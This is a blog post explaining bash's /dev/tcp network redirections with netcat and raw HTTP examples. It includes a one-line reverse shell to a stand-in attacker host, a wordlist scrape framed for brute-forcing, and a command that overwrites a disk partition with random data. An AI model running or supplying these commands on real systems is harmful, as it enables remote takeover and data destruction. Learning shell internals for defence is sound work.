I found UNIX a wonderful OS, whatever the flavors! I use it for 17 years and almost every week, I learn new stuffs. One of the particularities of UNIX is the way it communicate with devices. Except some specific devices, most of them are managed and visible as files or pseudo-files within the file system hierarchy. This is known as “everything’s a file“. Examples: /dev/null, /dev/random, /dev/stdin, /dev/stdout, /proc, etc. Some of those devices are always linked to the same file descriptor (or “FD“). stdin is “0”, stdout is “1” and stderr is “2”. Most devices accept standard system-calls like open(), clos(), read() an write(). Another particularity of UNIX is the primary user interface: the shell. There are plenty of shells; some of them are more oriented to developers, to high-skilled users etc. One of them is called “bash” and is available on most of the UNIX flavors, often as the default one. Most commands executed from your shell can take their input and output via pseudo files. Examples:
bash# cat /dev/random >/dev/sda1 bash# tar cvf archive.tar . >/dev/null bash# dd if=/dev/zero of=bigfile count=1000000
Very convenient! But bash implements something very interesting: the network redirections. It understands the following pseudo files: “/dev/tcp/host/port” and “/dev/udp/host/port“. An example?
First, we need to setup a “listener” on the destination host (192.168.1.10). netcat is your best friend:
root@destination# nc -l -p 8888
On the source host, bash will send packets to the listener:
root@source# bash -c "echo Hello World" >/dev/tcp/192.168.1.10/8888
The listener will display:
root@destination# nc -l -p 8888 Hello World root@destination#
Now the question will arise: when those network redirection could be helpful? First, bash can used without third party tools to grab data from the network. The example below fetch this blog main page:
exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0nn" >&5 cat <&5 exec 5>&-
Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:
exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0nn" >&5 cat <&5 exec 5>&- | sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "n"
Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:
victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0
As the bash shell is very common, it can be very interesting! Just use your imagination. to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “–enable-net-redirections“.